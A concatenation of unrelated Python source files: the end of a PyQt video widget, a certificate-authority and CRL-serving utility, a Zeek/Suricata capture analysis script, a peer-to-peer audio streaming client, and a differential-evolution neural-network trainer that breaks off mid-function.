Converts a point in the Video object PyQt space
into the pixel in the video element
'''
new_x = numpy.interp(x, [0, self.size().width()], [0, self.resolution[0]])
new_y = numpy.interp(y, [0, self.size().height()], [0, self.resolution[1]])
return (new_x, new_y)
def eventFilter(self, obj, event):
if obj is self:
if event.type() == QEvent.Enter:
self.mouse_over.emit((event, self))
elif event.type() == QEvent.Leave:
self.mouse_leave.emit((event, self))
return super(Video, self).eventFilter(obj, event)
def wheelEvent(self, a0: QtGui.QWheelEvent) -> None:
steps = a0.angleDelta().y() // 120
self.scroll_event.emit(steps, a0.position().x(), a0.position().y())
return super().wheelEvent(a0)
def mousePressEvent(self, a0: QtGui.QMouseEvent) -> None:
click = (a0.localPos().x(), a0.localPos().y())
frame_loc = self.convert_point_to_video(*click)
self.mouse_down.emit((self, frame_loc))
return super().mousePressEvent(a0)
def mouseMoveEvent(self, a0: QtGui.QMouseEvent) -> None:
click = (a0.localPos().x(), a0.localPos().y())
frame_loc = self.convert_point_to_video(*click)
self.mouse_move.emit((self, frame_loc))
return super().mouseMoveEvent(a0)
def mouseReleaseEvent(self, a0: QtGui.QMouseEvent) -> None:
click = (a0.localPos().x(), a0.localPos().y())
frame_loc = self.convert_point_to_video(*click)
self.mouse_up.emit((self, frame_loc))
return super().mouseReleaseEvent(a0)
def deleteLater(self):
print("Killing video thread")
self.__image_update_thread.kill()
class VideoWidget(QWidget): #QDock
Widgets = []
# Passthrough click events
mouse_down = pyqtSignal(tuple)
mouse_move = pyqtSignal(tuple)
mouse_up = pyqtSignal(tuple)
mouse_over = pyqtSignal(Video)
mouse_leave = pyqtSignal(Video)
scroll_event = pyqtSignal(Video, int, float, float)
def __init__(self, name="Video", path=None, toolbar=None):
super().__init__()
# self.setFloating(False)
# self.setFeatures(QDockWidget.DockWidgetMovable)
# self.setAllowedAreas(Qt.AllDockWidgetAreas)
# Structure
self.setLayout(QVBoxLayout())
self.setObjectName("VideoWidget")
# Close button
self.closeButton = QPushButton()
self.closeButton.setText("X")
self.closeButton.setEnabled(True)
self.closeButton.clicked.connect(self.deleteLater)
self.layout().addWidget(self.closeButton)
# Video
self.videoContainer = QWidget()
self.videoContainer.setLayout(QStackedLayout())
self.video = Video(None, video=path)
self.videoContainer.layout().addWidget(self.video)
self.layout().addWidget(self.videoContainer)
self.video.stateChanged.connect(self.__onPlayerStateChange)
# self.video.setFixedWidth(640)
# Buttons
self.buttonRow = QWidget()
self.buttonRowLayout = QHBoxLayout()
self.buttonRow.setLayout(self.buttonRowLayout)
self.layout().addWidget(self.buttonRow)
# Play
self.playButton = QPushButton()
self.playButton.setText("Play")
self.playButton.setEnabled(False)
self.playButton.clicked.connect(self.play)
self.buttonRowLayout.addWidget(self.playButton)
# Progress Bar
self.progressSlider = QSlider(Qt.Horizontal)
self.progressSlider.setRange(0, int(self.video.number_of_frames-1))
self.progressSlider.sliderMoved.connect(self.setPosition) # set position when user moves slider
self.progressSlider.sliderPressed.connect(self.video.pause) # pause when user presses slider
self.video.positionChanged.connect(self.progressSlider.setValue) # update the slider as video plays
self.buttonRowLayout.addWidget(self.progressSlider)
# Passthrough click events
self.video.mouse_down.connect(self.mouse_down.emit)
self.video.mouse_move.connect(self.mouse_move.emit)
self.video.mouse_up.connect(self.mouse_up.emit)
self.video.mouse_over.connect(lambda data: self.mouse_over.emit(data[1]))
self.video.mouse_leave.connect(lambda data: self.mouse_leave.emit(data[1]))
self.video.scroll_event.connect(lambda val, x, y: self.scroll_event.emit(self.video, val, x, y))
# Register with Toolbar
toolbar.register_video(self)
VideoWidget.Widgets.append(self)
self.destroyed.connect(lambda: VideoWidget.Widgets.remove(self)) # TODO: check if this works
@property
def display_resolution(self):
return (self.video.size().width(), self.video.size().height())
@property
def video_resolution(self):
return self.video.resolution
def pause(self):
self.video.pause()
def play(self):
''' plays or pauses video '''
if self.video.playing:
self.video.pause()
else:
self.video.play()
def __onPlayerStateChange(self, state):
''' changes the play/pause button depending on state '''
if state:
self.playButton.setText("Pause")
else:
self.playButton.setText("Play")
def setPosition(self, pos):
''' Sets the current playback position of the video '''
self.video.setPosition(pos)
def reblit(self):
self.video.reblit()
def export(self, filename) :
# QThread.thread()
# threading.Thread(target=self.video.export, args=(filename, ))
self.__export_progress_bar = QProgressBar()
self.layout().addWidget(self.__export_progress_bar)
self.__export_progress_bar.setGeometry(200, 80, 250, 20)
self.video.export(filename, self.__export_progress_bar)
# def __onVideoDurationChange(self, duration):
# self.progressSlider.setRange(0, duration)
def deleteLater(self) -> None:
print("Deleting")
self.video.deleteLater()
print("Deleted Video")
return super().deleteLater()
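# Illustrative wiring sketch (hypothetical paths and objects; a running QApplication and a
# toolbar object exposing register_video(widget) are required, neither is defined in this file):
#
#   from PyQt5.QtWidgets import QApplication
#   app = QApplication([])
#   widget = VideoWidget(name="Clip", path="./SampleVideo.mp4", toolbar=toolbar)
#   widget.show()
#   widget.play()                      # toggles between play and pause
#   widget.export("./output.mp4")      # renders frames through the Exporter thread
#   app.exec_()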
|
ca_util.py
|
#!/usr/bin/env python
'''
DISTRIBUTION STATEMENT A. Approved for public release: distribution unlimited.
This material is based upon work supported by the Assistant Secretary of Defense for
Research and Engineering under Air Force Contract No. FA8721-05-C-0002 and/or
FA8702-15-D-0001. Any opinions, findings, conclusions or recommendations expressed in this
material are those of the author(s) and do not necessarily reflect the views of the
Assistant Secretary of Defense for Research and Engineering.
Copyright 2015 Massachusetts Institute of Technology.
The software/firmware is provided to you on an As-Is basis
Delivered to the US Government with Unlimited Rights, as defined in DFARS Part
252.227-7013 or 7014 (Feb 2014). Notwithstanding any copyright notice, U.S. Government
rights in this work are defined by DFARS 252.227-7013 or DFARS 252.227-7014 as detailed
above. Use of this work other than as specifically authorized by the U.S. Government may
violate any copyrights that exist in this work.
'''
import common
logger = common.init_logging('ca-util')
import sys
import os
import crypto
import base64
import argparse
import ConfigParser
import getpass
import json
import zipfile
import cStringIO
import socket
import revocation_notifier
import threading
import BaseHTTPServer
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from SocketServer import ThreadingMixIn
import functools
import signal
import time
import tpm_exec
import datetime
if common.CA_IMPL=='cfssl':
import ca_impl_cfssl as ca_impl
elif common.CA_IMPL=='openssl':
import ca_impl_openssl as ca_impl
else:
raise Exception("Unknown CA implementation: %s"%common.CA_IMPL)
from M2Crypto import X509, EVP, BIO
config = ConfigParser.SafeConfigParser()
config.read(common.CONFIG_FILE)
"""
Tools for creating a CA cert and signed server certs.
Divined from http://svn.osafoundation.org/m2crypto/trunk/tests/test_x509.py
The mk_temporary_xxx calls return a NamedTemporaryFile with certs.
Usage:
# Create a temporary CA cert and its private key
cacert, cakey = mk_temporary_cacert()
# Create a temporary server cert+key, signed by the CA
server_cert = mk_temporary_cert(cacert.name, cakey.name, '*.server.co.uk')
"""
# protips
# openssl verify -CAfile cacert.crt cacert.crt cert.crt
# openssl x509 -in cert.crt -noout -text
# openssl x509 -in cacert.crt -noout -text
global_password=None
def globalcb(*args):
global global_password
return str(global_password)
def setpassword(pw):
global global_password
if len(pw)==0:
raise Exception("You must specify a password!")
global_password = pw
def cmd_mkcert(workingdir,name):
cwd = os.getcwd()
try:
common.ch_dir(workingdir,logger)
priv = read_private()
cacert = X509.load_cert('cacert.crt')
ca_pk = EVP.load_key_string(str(priv[0]['ca']))
cert,pk = ca_impl.mk_signed_cert(cacert,ca_pk,name,priv[0]['lastserial']+1)
with open('%s-cert.crt'%name, 'w') as f:
f.write(cert.as_pem())
f = BIO.MemoryBuffer()
pk.save_key_bio(f,None)
priv[0][name]=f.getvalue()
f.close()
#increment serial number after successful creation
priv[0]['lastserial']+=1
write_private(priv)
# write out the private key with password
with os.fdopen(os.open("%s-private.pem"%name,os.O_WRONLY | os.O_CREAT,0600), 'w') as f:
biofile = BIO.File(f)
pk.save_key_bio(biofile, 'aes_256_cbc', globalcb)
biofile.close()
pk.get_rsa().save_pub_key('%s-public.pem'%name)
cc = X509.load_cert('%s-cert.crt'%name)
if cc.verify(cacert.get_pubkey()):
logger.info("Created certificate for name %s successfully in %s"%(name,workingdir))
else:
logger.error("ERROR: Cert does not validate against CA")
finally:
os.chdir(cwd)
def cmd_init(workingdir):
cwd = os.getcwd()
try:
common.ch_dir(workingdir,logger)
rmfiles("*.pem")
rmfiles("*.crt")
rmfiles("*.zip")
rmfiles("*.der")
rmfiles("private.json")
cacert, ca_pk, _ = ca_impl.mk_cacert()
priv=read_private()
# write out keys
with open('cacert.crt', 'wb') as f:
f.write(cacert.as_pem())
f = BIO.MemoryBuffer()
ca_pk.save_key_bio(f,None)
priv[0]['ca']=f.getvalue()
f.close()
# store the last serial number created.
# the CA is always serial # 1
priv[0]['lastserial'] = 1
write_private(priv)
ca_pk.get_rsa().save_pub_key('ca-public.pem')
# generate an empty crl
crl = ca_impl.gencrl([],cacert.as_pem(),str(priv[0]['ca']))
with open('cacrl.der','wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der","cacrl.pem")
# Sanity checks...
cac = X509.load_cert('cacert.crt')
if cac.verify():
logger.info("CA certificate created successfully in %s"%workingdir)
else:
logger.error("ERROR: Cert does not self validate")
finally:
os.chdir(cwd)
def cmd_certpkg(workingdir,name,insecure=False):
cwd = os.getcwd()
try:
common.ch_dir(workingdir,logger)
# zip up the crt, private key, and public key
with open('cacert.crt','r') as f:
cacert = f.read()
with open("%s-public.pem"%name,'rb') as f:
pub = f.read()
with open("%s-cert.crt"%name,'rb') as f:
cert = f.read()
with open('cacrl.der','r') as f:
crl = f.read()
with open('cacrl.pem','r') as f:
crlpem = f.read()
cert_obj = X509.load_cert_string(cert)
serial = cert_obj.get_serial_number()
subject = str(cert_obj.get_subject())
priv = read_private()
private = priv[0][name]
with open("%s-private.pem"%name,'rb') as f:
prot_priv = f.read()
#code to create a pem formatted protected private key using the keystore password
# pk = EVP.load_key_string(str(priv[0][name]))
# f = BIO.MemoryBuffer()
# # globalcb will return the global password provided by the user
# pk.save_key_bio(f, 'aes_256_cbc', globalcb)
# prot_priv = f.getvalue()
# f.close()
# no compression to avoid extraction errors in tmpfs
sf = cStringIO.StringIO()
with zipfile.ZipFile(sf,'w',compression=zipfile.ZIP_STORED) as f:
f.writestr('%s-public.pem'%name,pub)
f.writestr('%s-cert.crt'%name,cert)
f.writestr('%s-private.pem'%name,private)
f.writestr('cacert.crt',cacert)
f.writestr('cacrl.der',crl)
f.writestr('cacrl.pem',crlpem)
pkg = sf.getvalue()
if insecure:
logger.warn("Unprotected private keys in cert package being written to disk")
with open('%s-pkg.zip'%name,'w') as f:
f.write(pkg)
else:
# actually output the package to disk with a protected private key
with zipfile.ZipFile('%s-pkg.zip'%name,'w',compression=zipfile.ZIP_STORED) as f:
f.writestr('%s-public.pem'%name,pub)
f.writestr('%s-cert.crt'%name,cert)
f.writestr('%s-private.pem'%name,prot_priv)
f.writestr('cacert.crt',cacert)
f.writestr('cacrl.der',crl)
f.writestr('cacrl.pem',crlpem)
logger.info("Creating cert package for %s in %s-pkg.zip"%(name,name))
return pkg,serial,subject
finally:
os.chdir(cwd)
def convert_crl_to_pem(derfile,pemfile):
if config.get('general','ca_implementation')=='openssl':
with open(pemfile,'w') as f:
f.write("")
else:
tpm_exec.run("openssl crl -in %s -inform der -out %s"%(derfile,pemfile),lock=False)
def get_crl_distpoint(cert_path):
cert_obj = X509.load_cert(cert_path)
text= cert_obj.as_text()
incrl=False
distpoint=""
for line in text.split('\n'):
line = line.strip()
if line.startswith("X509v3 CRL Distribution Points:"):
incrl = True
if incrl and line.startswith("URI:"):
distpoint = line[4:]
break
return distpoint
# to check: openssl crl -inform DER -text -noout -in cacrl.der
def cmd_revoke(workingdir,name=None,serial=None):
cwd = os.getcwd()
try:
common.ch_dir(workingdir,logger)
priv = read_private()
if name is not None and serial is not None:
raise Exception("You may not specify a cert and a serial at the same time")
if name is None and serial is None:
raise Exception("You must specify a cert or a serial to revoke")
if name is not None:
# load up the cert
cert = X509.load_cert("%s-cert.crt"%name)
serial = cert.get_serial_number()
#convert serial to string
serial = str(serial)
# get the ca key cert and keys as strings
with open('cacert.crt','r') as f:
cacert = f.read()
ca_pk = str(priv[0]['ca'])
if serial not in priv[0]['revoked_keys']:
priv[0]['revoked_keys'].append(serial)
crl = ca_impl.gencrl(priv[0]['revoked_keys'],cacert,ca_pk)
write_private(priv)
# write out the CRL to the disk
with open('cacrl.der','wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der","cacrl.pem")
finally:
os.chdir(cwd)
return crl
# regenerate the crl without revoking anything
def cmd_regencrl(workingdir):
cwd = os.getcwd()
try:
common.ch_dir(workingdir,logger)
priv = read_private()
# get the ca key cert and keys as strings
with open('cacert.crt','r') as f:
cacert = f.read()
ca_pk = str(priv[0]['ca'])
crl = ca_impl.gencrl(priv[0]['revoked_keys'],cacert,ca_pk)
write_private(priv)
# write out the CRL to the disk
with open('cacrl.der','wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der","cacrl.pem")
finally:
os.chdir(cwd)
return crl
def cmd_listen(workingdir,cert_path):
#just load up the password for later
read_private()
serveraddr = ('', common.CRL_PORT)
server = ThreadedCRLServer(serveraddr,CRLHandler)
if os.path.exists('%s/cacrl.der'%workingdir):
logger.info("Loading existing crl: %s/cacrl.der"%workingdir)
with open('%s/cacrl.der'%workingdir,'r') as f:
server.setcrl(f.read())
t = threading.Thread(target=server.serve_forever)
logger.info("Hosting CRL on %s:%d"%(socket.getfqdn(),common.CRL_PORT))
t.start()
def check_expiration():
logger.info("checking CRL for expiration every hour")
while True:
try:
if os.path.exists('%s/cacrl.der'%workingdir):
retout = tpm_exec.run("openssl crl -inform der -in %s/cacrl.der -text -noout"%workingdir,lock=False)[0]
for line in retout:
line = line.strip()
if line.startswith("Next Update:"):
expire = datetime.datetime.strptime(line[13:],"%b %d %H:%M:%S %Y %Z")
# check expiration within 6 hours
in1hour = datetime.datetime.utcnow()+datetime.timedelta(hours=6)
if expire<=in1hour:
logger.info("Certificate to expire soon %s, re-issuing"%expire)
cmd_regencrl(workingdir)
# check a little less than every hour
time.sleep(3540)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
#server.shutdown()
break
t2 = threading.Thread(target=check_expiration)
t2.setDaemon(True)
t2.start()
def revoke_callback(revocation):
serial = revocation.get("metadata",{}).get("cert_serial",None)
if revocation.get('type',None) != 'revocation' or serial is None:
logger.error("Unsupported revocation message: %s"%revocation)
return
logger.info("Revoking certificate: %s"%serial)
server.setcrl(cmd_revoke(workingdir, None, serial))
try:
while True:
try:
revocation_notifier.await_notifications(revoke_callback,revocation_cert_path=cert_path)
except Exception as e:
logger.exception(e)
logger.warn("No connection to revocation server, retrying in 10s...")
time.sleep(10)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
server.shutdown()
sys.exit()
class ThreadedCRLServer(ThreadingMixIn, HTTPServer):
published_crl = None
def setcrl(self,crl):
self.published_crl = crl
class CRLHandler(BaseHTTPRequestHandler):
def do_GET(self):
logger.info('GET invoked from ' + str(self.client_address) + ' with uri:' + self.path)
if self.server.published_crl is None:
self.send_response(404)
self.end_headers()
else:
# send back the CRL
self.send_response(200)
self.end_headers()
self.wfile.write(self.server.published_crl)
def rmfiles(path):
import glob
files = glob.glob(path)
for f in files:
os.remove(f)
def write_private(inp):
priv = inp[0]
salt = inp[1]
global global_password
priv_encoded = json.dumps(priv)
key = crypto.kdf(global_password,salt)
ciphertext = crypto.encrypt(priv_encoded,key)
towrite = {'salt':salt,'priv':ciphertext}
with os.fdopen(os.open('private.json',os.O_WRONLY | os.O_CREAT,0600), 'w') as f:
json.dump(towrite,f)
def read_private():
global global_password
if global_password is None:
setpassword(getpass.getpass("Please enter the password to decrypt your keystore: "))
if os.path.exists('private.json'):
with open('private.json','r') as f:
toread = json.load(f)
key = crypto.kdf(global_password,toread['salt'])
try:
plain = crypto.decrypt(toread['priv'],key)
except ValueError:
raise Exception("Invalid password for keystore")
return json.loads(plain),toread['salt']
else:
#file doesn't exist, just invent a salt
return {'revoked_keys':[]},base64.b64encode(crypto.generate_random_key())
def main(argv=sys.argv):
parser = argparse.ArgumentParser(argv[0])
parser.add_argument('-c', '--command',action='store',dest='command',required=True,help="valid commands are init,create,pkg,revoke,listen")
parser.add_argument('-n', '--name',action='store',help='the common name of the certificate to create')
parser.add_argument('-d','--dir',action='store',help='use a custom directory to store certificates and keys')
parser.add_argument('-i','--insecure',action='store_true',default=False,help='create cert packages with unprotected private keys and write them to disk. USE WITH CAUTION!')
if common.DEVELOP_IN_ECLIPSE and len(argv)==1:
argv=['-c','init']
#argv=['-c','create','-n',socket.getfqdn()]
argv=['-c','create','-n','client']
#argv=['-c','pkg','-n','client']
argv=['-c','revoke','-n','client']
argv=['-c','listen','-d','myca']
else:
argv = argv[1:]
# never prompt for passwords in development mode
if common.DEVELOP_IN_ECLIPSE:
setpassword('default')
args = parser.parse_args(argv)
    if args.dir is None:
if os.getuid()!=0 and common.REQUIRE_ROOT:
logger.error("If you don't specify a working directory, this process must be run as root to access %s"%common.WORK_DIR)
sys.exit(-1)
workingdir = common.CA_WORK_DIR
else:
workingdir = args.dir
if args.command=='init':
cmd_init(workingdir)
elif args.command=='create':
if args.name is None:
logger.error("you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_mkcert(workingdir,args.name)
elif args.command=='pkg':
if args.name is None:
logger.error("you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_certpkg(workingdir,args.name,args.insecure)
elif args.command=='revoke':
if args.name is None:
logger.error("you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_revoke(workingdir, args.name)
elif args.command=='listen':
if args.name is None:
args.name = "%s/RevocationNotifier-cert.crt"%workingdir
logger.warning("using default name for revocation cert %s"%args.name)
cmd_listen(workingdir,args.name)
else:
logger.error("Invalid command: %s"%args.command)
parser.print_help()
sys.exit(-1)
if __name__=="__main__":
try:
main()
except Exception as e:
logger.exception(e)
|
analysis.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from classes.zeekengine import ZeekEngine
from classes.suricataengine import SuricataEngine
from multiprocessing import Process, Manager
import sys
import re
import json
import os
"""
This file is called by the frontend but the analysis
can be done in standalone by just submitting the directory
containing a capture.pcap file.
"""
if __name__ == "__main__":
if len(sys.argv) == 2:
capture_directory = sys.argv[1]
if os.path.isdir(capture_directory):
# Alerts bucket.
manager = Manager()
alerts = manager.dict()
def zeekengine(alerts):
zeek = ZeekEngine(capture_directory)
zeek.start_zeek()
alerts["zeek"] = zeek.get_alerts()
def snortengine(alerts):
suricata = SuricataEngine(capture_directory)
suricata.start_suricata()
alerts["suricata"] = suricata.get_alerts()
# Start the engines.
p1 = Process(target=zeekengine, args=(alerts,))
p2 = Process(target=snortengine, args=(alerts,))
p1.start()
p2.start()
            # Wait for them to finish.
p1.join()
p2.join()
            # Some formatting and alerts.json writing.
with open(os.path.join(capture_directory, "alerts.json"), "w") as f:
report = {"high": [], "moderate": [], "low": []}
for alert in (alerts["zeek"] + alerts["suricata"]):
if alert["level"] == "High":
report["high"].append(alert)
if alert["level"] == "Moderate":
report["moderate"].append(alert)
if alert["level"] == "Low":
report["low"].append(alert)
f.write(json.dumps(report))
else:
print("The directory doesn't exist.")
else:
print("Please specify a capture directory in argument.")
|
client_audio_multi_2.py
|
#!/usr/bin/env python
import pyaudio
import socket
import sys
import time
from array import array
from struct import pack
from multiprocessing import Process
# Pyaudio Initialization
chunk = 1024
FORMAT = pyaudio.paInt16
CHANNELS = 1
RATE = 10240
backlog = 5
THRESHOLD = 5
def is_silent(snd_data):
    # return True if the chunk is below the silence threshold
return max(snd_data) < THRESHOLD
def audioSend(stream):
    # Main functionality: read audio from the mic and stream it to the peer
    count_silent = 0  # silence counter; without it the connection would close immediately
    while 1:
        data = array('h', stream.read(chunk))
        silent = is_silent(data)
        if silent:
            count_silent += 1
            if count_silent > 65:
                print 'stop'
                break  # once the silence counter hits 65, close the connection
        socketSend.send(data.tostring())
        #socketSend.recv(size)
def audioRecv(stream):
    # accept the incoming connection from the peer and play whatever arrives
    conn, addr = socketRecv.accept()
    while 1:
        data = conn.recv(size)
        if data:
            #print 'receiving!'
            # Write the received audio data to the pyaudio output stream
            stream.write(data)
pSend = pyaudio.PyAudio()
streamSend = pSend.open(format = FORMAT,
channels = CHANNELS,
rate = RATE,
input = True,
frames_per_buffer = chunk)
pRecv = pyaudio.PyAudio()
streamRecv = pRecv.open(format = FORMAT,
channels = CHANNELS,
rate = RATE,
output = True)
# Socket Initialization
size = 1024
# Parameters to start server
print 'Enter the desired Server Port'
portRecv = int(sys.stdin.readline())
socketRecv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socketRecv.bind(('',portRecv))
socketRecv.listen(backlog)
print 'Server Started!'
# Parameters to connect to recipient
print 'Enter the IP of the recipient'
hostSend = sys.stdin.readline()
print 'Enter the port number'
portSend = int(sys.stdin.readline())
print 'Trying to connect to ' + hostSend + ' ' + str(portSend)
socketSend = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socketSend.connect((hostSend.strip(), portSend))
print 'Press enter to start VOIP'
sys.stdin.readline()
procRecv = Process(target = audioRecv, args = (streamRecv,))
procSend = Process(target = audioSend, args = (streamSend,))
procRecv.daemon = True
procSend.daemon = True
procRecv.start()
procSend.start()
# wait for the sending side to finish (it exits once enough silence is detected)
procSend.join()
socketRecv.close()
socketSend.close()
streamSend.close()
streamRecv.close()
pSend.terminate()
pRecv.terminate()
|
NNDE.py
|
import numpy as np
from keras.models import Sequential
from keras.layers import Dense, Activation
from sklearn.model_selection import StratifiedKFold
def gen_rand(n_size=1):
'''
    This function returns an n_size-dimensional random vector.
'''
return np.random.random(n_size)
class NN_DE(object):
    def __init__(self, n_pop=10, n_neurons=5, F=0.2, Cr=0.9, p=1, change_scheme=True, scheme='rand',
                 bounds=[-1, 1], max_sp_evals=int(1e5)):
#self.n_gens=n_gens
self.n_pop=n_pop
self.n_neurons=n_neurons
self.F=F*np.ones(self.n_pop)
self.Cr=Cr*np.ones(self.n_pop)
self.bounds=bounds
self.p=p
self.scheme=scheme
self.change_schame=change_scheme
self.max_sp_evals=max_sp_evals
self.sp_evals=0
self.interactions=0
# Build generic model
model = Sequential()
model.add(Dense(self.n_neurons, input_dim=100, activation='tanh'))
model.add(Dense(1, activation='tanh'))
model.compile( loss='mean_squared_error', optimizer = 'rmsprop', metrics = ['accuracy'] )
self.model=model
self.change_schame=False
self.n_dim=model.count_params()
#self.population=NN_DE.init_population(self, pop_size=self.n_pop,
# dim=self.n_dim, bounds=self.bounds)
#self.train_dataset= train_dataset
#self.test_dataset= test_dataset
def init_population(self, pop_size, dim, bounds=[-1,1]):
'''
        This function initializes the population to be used in DE.
        Arguments:
        pop_size - Number of individuals (there is no default value for this yet).
dim - dimension of the search space (default is 1).
bounds - The inferior and superior limits respectively (default is [-1, 1]).
'''
return np.random.uniform(low=bounds[0], high=bounds[1], size=(pop_size, dim))
def keep_bounds(self, pop, bounds, idx):
'''
        This function keeps the population in the search space.
Arguments:
pop - Population;
bounds - The inferior and superior limits respectively
'''
#up_ = np.where(pop>bounds[1])
#down_ = np.where(pop<bounds[1])
#best_ = pop[idx]
#print(pop[pop<bounds[0]])
#print(down_)
#print(best_.shape)
pop[pop<bounds[0]] = bounds[0]; pop[pop>bounds[1]] = bounds[1]
#pop[pop<bounds[0]] = 0.5*(bounds[0]+best_[down_]); pop[pop>bounds[1]] = 0.5*(bounds[1]+best_[up_])
return pop
# Define the Fitness to be used in DE
def sp_fitness(self, target, score):
'''
Calculate the SP index and return the index of the best SP found
Arguments:
target: True labels
score: the predicted labels
'''
from sklearn.metrics import roc_curve
fpr, tpr, thresholds = roc_curve(target, score)
jpr = 1. - fpr
sp = np.sqrt( (tpr + jpr)*.5 * np.sqrt(jpr*tpr) )
idx = np.argmax(sp)
return sp[idx], tpr[idx], fpr[idx]#sp, idx, sp[idx], tpr[idx], fpr[idx]
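    # For reference, the SP index computed above is, with PD = tpr and PF = fpr,
    #     SP = sqrt( sqrt(PD * (1 - PF)) * (PD + (1 - PF)) / 2 )
    # and the method returns the ROC operating point that maximises it.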
def convert_vector_weights(self, pop, nn_model):
model = nn_model
generic_weights = model.get_weights()
hl_lim = generic_weights[0].shape[0]*generic_weights[0].shape[1]
w = []
hl = pop[:hl_lim]
ol = pop[hl_lim+generic_weights[1].shape[0]:hl_lim+generic_weights[1].shape[0]+generic_weights[1].shape[0]]
w.append(hl.reshape(generic_weights[0].shape))
w.append(pop[hl_lim:hl_lim+generic_weights[1].shape[0]])
w.append(ol.reshape(generic_weights[2].shape))
w.append(np.array(pop[-1]).reshape(generic_weights[-1].shape))
return w
def set_weights_to_keras_model_and_compute_fitness(self,pop, data, test_data, nn_model):
'''
This function will create a generic model and set the weights to this model and compute the fitness.
Arguments:
pop - The population of weights.
data - The samples to be used to test.
'''
fitness = np.zeros((pop.shape[0],3))
test_fitness = np.zeros((pop.shape[0],3))
model=nn_model
for ind in range(pop.shape[0]):
w = NN_DE.convert_vector_weights(self, pop=pop[ind], nn_model=model)
model.set_weights(w)
y_score = model.predict(data[0])
fitness[ind] = NN_DE.sp_fitness(self, target=data[1], score=y_score)
            # Compute the SP for the test set in the same call to minimize the evals
test_y_score = model.predict(test_data[0])
test_fitness[ind] = NN_DE.sp_fitness(self, target=test_data[1], score=test_y_score)
#print('Population ind: {} - SP: {} - PD: {} - PF: {}'.format(ind, fitness[ind][0], fitness[ind][1], fitness[ind][2]))
return fitness, test_fitness
def evolution(self, train_dataset, test_dataset):
self.population=NN_DE.init_population(self, pop_size=self.n_pop,
dim=self.n_dim, bounds=self.bounds)
r_NNDE = {}
fitness, test_fitness = NN_DE.set_weights_to_keras_model_and_compute_fitness(self, pop=self.population,
data=train_dataset,
test_data=test_dataset,
nn_model=self.model)
best_idx = np.argmax(fitness[:,0])
#print('Best NN found - SP: {} / PD: {} / FA: {}'.format(fitness[best_idx][0],
# fitness[best_idx][1],
# fitness[best_idx][2]))
#print('Test > Mean - SP: {} +- {}'.format(np.mean(test_fitness,axis=0)[0],
# np.std(test_fitness,axis=0)[0]))
        # Create the vectors F and Cr to be adapted during the iterations
NF = np.zeros_like(self.F)
NCr = np.zeros_like(self.Cr)
# Create a log
r_NNDE['log'] = []
r_NNDE['log'].append((self.sp_evals, fitness[best_idx], np.mean(fitness, axis=0),
np.std(fitness, axis=0), np.min(fitness, axis=0), np.median(fitness, axis=0), self.F, self.Cr))
r_NNDE['test_log'] = []
r_NNDE['test_log'].append((self.sp_evals, test_fitness[best_idx], np.mean(test_fitness, axis=0),
np.std(test_fitness, axis=0), np.min(test_fitness, axis=0), np.median(test_fitness, axis=0), self.F, self.Cr))
while self.sp_evals < self.max_sp_evals:
#print('===== Interaction: {} ====='.format(self.interactions+1))
# ============ Mutation Step ===============
mutant = np.zeros_like(self.population)
for ind in range(self.population.shape[0]):
if gen_rand() < 0.1:
NF[ind] = 0.2 +0.2*gen_rand()
else:
NF[ind] = self.F[ind]
tmp_pop = np.delete(self.population, ind, axis=0)
choices = np.random.choice(tmp_pop.shape[0], 1+2*self.p, replace=False)
diffs = 0
for idiff in range(1, len(choices), 2):
diffs += NF[ind]*((tmp_pop[choices[idiff]]-tmp_pop[choices[idiff+1]]))
if self.scheme=='rand':
mutant[ind] = tmp_pop[choices[0]] + diffs
elif self.scheme=='best':
mutant[ind] = self.population[best_idx] + diffs
# keep the bounds
mutant = NN_DE.keep_bounds(self, mutant, bounds=[-1,1], idx=best_idx)
# ============ Crossover Step =============
trial_pop = np.copy(self.population)
K = np.random.choice(trial_pop.shape[1])
for ind in range(trial_pop.shape[0]):
if gen_rand() < 0.1:
NCr[ind] = 0.8 +0.2*gen_rand()
else:
NCr[ind] = self.Cr[ind]
for jnd in range(trial_pop.shape[1]):
if jnd == K or gen_rand()<NCr[ind]:
trial_pop[ind][jnd] = mutant[ind][jnd]
# keep the bounds
trial_pop = NN_DE.keep_bounds(self, trial_pop, bounds=[-1,1], idx=best_idx)
trial_fitness, test_fitness = NN_DE.set_weights_to_keras_model_and_compute_fitness(self, pop=trial_pop,
data=train_dataset,
test_data=test_dataset,
nn_model=self.model)
self.sp_evals += self.population.shape[0]
# ============ Selection Step ==============
winners = np.where(trial_fitness[:,0]>fitness[:,0])
            # Auto-adaptation of F and Cr like NSSDE
self.F[winners] = NF[winners]
self.Cr[winners] = NCr[winners]
# Greedy Selection
fitness[winners] = trial_fitness[winners]
self.population[winners] = trial_pop[winners]
best_idx = np.argmax(fitness[:,0])
if self.interactions > 0.95*self.max_sp_evals/self.n_pop:
print('=====Interaction: {}====='.format(self.interactions+1))
print('Best NN found - SP: {} / PD: {} / FA: {}'.format(fitness[best_idx][0],
fitness[best_idx][1],
fitness[best_idx][2]))
print('Test > Mean - SP: {} +- {}'.format(np.mean(test_fitness,axis=0)[0],
np.std(test_fitness,axis=0)[0]))
self.interactions += 1.0
#if fitness[best_idx][0]>0.90 and self.change_schame==False:
# if self.scheme == 'best':
# if self.scheme!='rand':
# print('Changing the scheme to rand/p/bin')
# self.scheme = 'rand'
# self.change_schame=True
# else:
# if self.scheme!='best':
# print('Changing the scheme to best/p/bin')
# self.scheme = 'best'
# self.change_schame=True
r_NNDE['log'].append((self.sp_evals, fitness[best_idx], np.mean(fitness, axis=0),
np.std(fitness, axis=0), np.min(fitness, axis=0), np.median(fitness, axis=0), self.F, self.Cr))
r_NNDE['test_log'].append((self.sp_evals, test_fitness[best_idx], np.mean(test_fitness, axis=0),
np.std(test_fitness, axis=0), np.min(test_fitness, axis=0), np.median(test_fitness, axis=0), self.F, self.Cr))
# Compute the test
